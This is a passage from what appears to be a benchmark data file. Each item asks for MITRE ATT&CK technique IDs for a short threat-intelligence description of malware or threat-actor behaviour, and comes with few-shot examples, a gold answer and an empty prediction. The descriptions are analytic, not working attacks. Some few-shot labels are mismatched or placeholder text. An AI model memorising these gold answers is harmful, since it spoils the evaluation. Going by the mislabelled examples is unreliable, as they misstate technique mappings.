Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as C&C server\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Magic Hound has acquired Amazon S3 buckets to use in C2.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection\n\t - T1102: Web Service\n", + "input": "APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n- Text: More_eggs has used an RC4-based encryption method for its C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Higaisa used a FakeTLS session for C2 communications.", + "gold": "- T1001.003: Data Obfuscation - Protocol Impersonation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Peppy can identify specific files for exfiltration.\n\t - T1083: File and Directory Discovery\n- Text: In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted\n\t - T1087.001: Account Discovery - Local Account\n- Text: Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "LookBack can retrieve file listings from the victim machine.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)\n\t - T1005: Data from Local System\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n\t - T1486: Data Encrypted for Impact\n", + "input": "Empire can use GitHub for data exfiltration.", + "gold": "- T1567.001: Exfiltration Over Web Service - Exfiltration to Code Repository", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Astaroth uses an external software known as NetPass to recover passwords.\n\t - T1552: Unsecured Credentials\n\t - T1555: Credentials from Password Stores\n", + "input": "OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. OilRig has also used tool named PICKPOCKET to dump passwords from web browsers.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Variants of have added Run Registry keys to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file \"Java(TM) Platform SE Auto Updater.lnk\" in the \"Startup\" special folder pointing to the main backdoor JavaScript\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Magic Hound has modified Registry settings for security tools.\n\t - T1112: Modify Registry\n", + "input": "Amadey has changed the Startup folder to the one containing its executable by overwriting the registry keys.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.\n\t - T1572: Protocol Tunneling\n", + "input": "Kazuar has used internal nodes on the compromised network for C2 communications.", + "gold": "- T1090.001: Proxy - Internal Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Get2 has the ability to inject DLLs into processes.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: PipeMon has used call to \"LoadLibrary\" to load its installer. PipeMon loads its modules using reflective loading or custom shellcode.\n\t - T1129: Shared Modules\n", + "input": "SDBbot has used rundll32.exe to execute DLLs.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FlawedAmmyy can collect clipboard data.\n\t - T1115: Clipboard Data\n- Text: PoshC2 contains a module for compressing data using ZIP.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.\n\t - T1005: Data from Local System\n", + "input": "During Operation Wocao, threat actors collected clipboard data in plaintext.", + "gold": "- T1115: Clipboard Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine: Deletes the LNK file from the startup directory\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Pony has used batch scripts to delete itself after execution.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: Crimson can identify the user on a targeted system.\n\t - T1033: System Owner/User Discovery\n- Text: A multilayered approach is a must to securing the organization\u2019s perimeter, especially for information security professionals and system/IT administrators\n\t - T1082: System Information Discovery\n", + "input": "Sys10 collects the group name of the logged-in user and sends it to the C2.", + "gold": "- T1069.001: Permission Groups Discovery - Local Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.\n\t - T1014: Rootkit\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n- Text: No matching sample found for T1574.012\n- Text: No matching sample found for T1055.014\n", + "input": "HiddenWasp adds itself as a shared object to the LD_PRELOAD environment variable.", + "gold": "- T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI can delete files.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.\n\t - T1485: Data Destruction\n- Text: After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command\n\t - T1490: Inhibit System Recovery\n", + "input": "Kazuar can delete files.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa has used a custom JSON-based protocol for its C&C communications.\n\t - T1095: Non-Application Layer Protocol\n- Text: WIRTE has used HTTPS over ports 2083 and 2087 for C2.\n\t - T1571: Non-Standard Port\n- Text: Rising Sun can test a connection to a specified network IP address over a specified port number.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n", + "input": "SUGARUSH has used TCP for C2.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n- Text: BITTER has obtained tools such as PuTTY for use in their operations.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system\u2019s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods\n\t - T1210: Exploitation of Remote Services\n", + "input": "BackdoorDiplomacy has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.", + "gold": "- T1588.001: Obtain Capabilities - Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: can perform DLL loading.\n\t - T1055: Process Injection\n- Text: Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex\n\t - T1129: Shared Modules\n", + "input": "IronNetInjector has the ability to inject a DLL into running processes, including the IronNetInjector DLL into explorer.exe.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses rundll32 to call an exported function.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems\n\t - T1569.002: System Services - Service Execution\n- Text: Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.\n\t - T1495: Firmware Corruption\n", + "input": "Bad Rabbit has used rundll32 to launch a malicious DLL as \"C:Windowsinfpub.dat\".", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection\n\t - T1489: Service Stop\n- Text: TinyZBot can disable Avira anti-virus.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: runs the command: net start >> %TEMP%\\info.dat on a victim.\n\t - T1007: System Service Discovery\n", + "input": "Cuba has a hardcoded list of services and processes to terminate.", + "gold": "- T1489: Service Stop", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL landing page presents the recipient with a password for a ZIP file.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1204.002: User Execution - Malicious File\n", + "input": "FIN6 has targeted victims with e-mails containing malicious attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Anchor can install itself as a cron job.\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\t - T1025: Data from Removable Media\n\t - T1543: Create or Modify System Process\n\t - T1005: Data from Local System\n\t - T1091: Replication Through Removable Media\n- Text: Pupy can be used to establish persistence using a systemd service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n", + "input": "Xbash can create a cronjob for persistence if it determines it is on a Linux system.", + "gold": "- T1053.003: Scheduled Task/Job - Cron", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services\n\t - T1552.004: Unsecured Credentials - Private Keys\n\t - T1550: Use Alternate Authentication Material\n- Text: Since version 0.4.1 Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user\n\t - T1606.002: Forge Web Credentials - SAML Tokens\n- Text: APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n", + "input": "UNC2452 obtained the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.", + "gold": "- T1552.004: Unsecured Credentials - Private Keys", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Magic Hound has exported emails from compromised Exchange servers.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: StrongPity can automatically exfiltrate collected documents to the C2 server.\n\t - T1020: Automated Exfiltration\n- Text: QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "CORALDECK searches for specified files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used regsvr32.exe to execute a server variant of in victim networks.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: Ragnar Locker has used rundll32.exe to execute components of VirtualBox.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.\n\t - T1496: Resource Hijacking\n", + "input": "Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.\n\t - T1505.004: Server Software Component - IIS Components\n- Text: Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Cuba loaded the payload into memory using PowerShell.\n\t - T1620: Reflective Code Loading\n", + "input": "OwaAuth has been loaded onto Exchange servers and disguised as an ISAPI filter (owaauth.dll). The IIS w3wp.exe process then loads the malicious DLL.", + "gold": "- T1505.004: Server Software Component - IIS Components", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.\n\t - T1486: Data Encrypted for Impact\n- Text: Wizard Spider has used the \u201cnet view\u201d command to locate mapped network shares.\n\t - T1135: Network Share Discovery\n- Text: Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.\n\t - T1495: Firmware Corruption\n", + "input": "Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management 